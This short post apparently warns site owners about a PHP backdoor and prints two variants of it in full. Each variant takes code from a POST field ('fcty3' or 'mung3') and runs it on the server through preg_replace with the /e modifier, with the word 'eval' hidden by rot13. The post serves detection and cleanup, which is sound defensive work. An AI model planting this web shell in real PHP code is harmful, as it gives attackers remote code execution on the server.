This code receives php code from $_POST[‘fcty3’] OR $_POST[‘mung3’] variables, and execute on server with preg_replace.
So if you find this in your site, remove it immediately!
<?php ($www= $_POST['fcty3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
Another type:
<?php ($www= $_POST['mung3']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>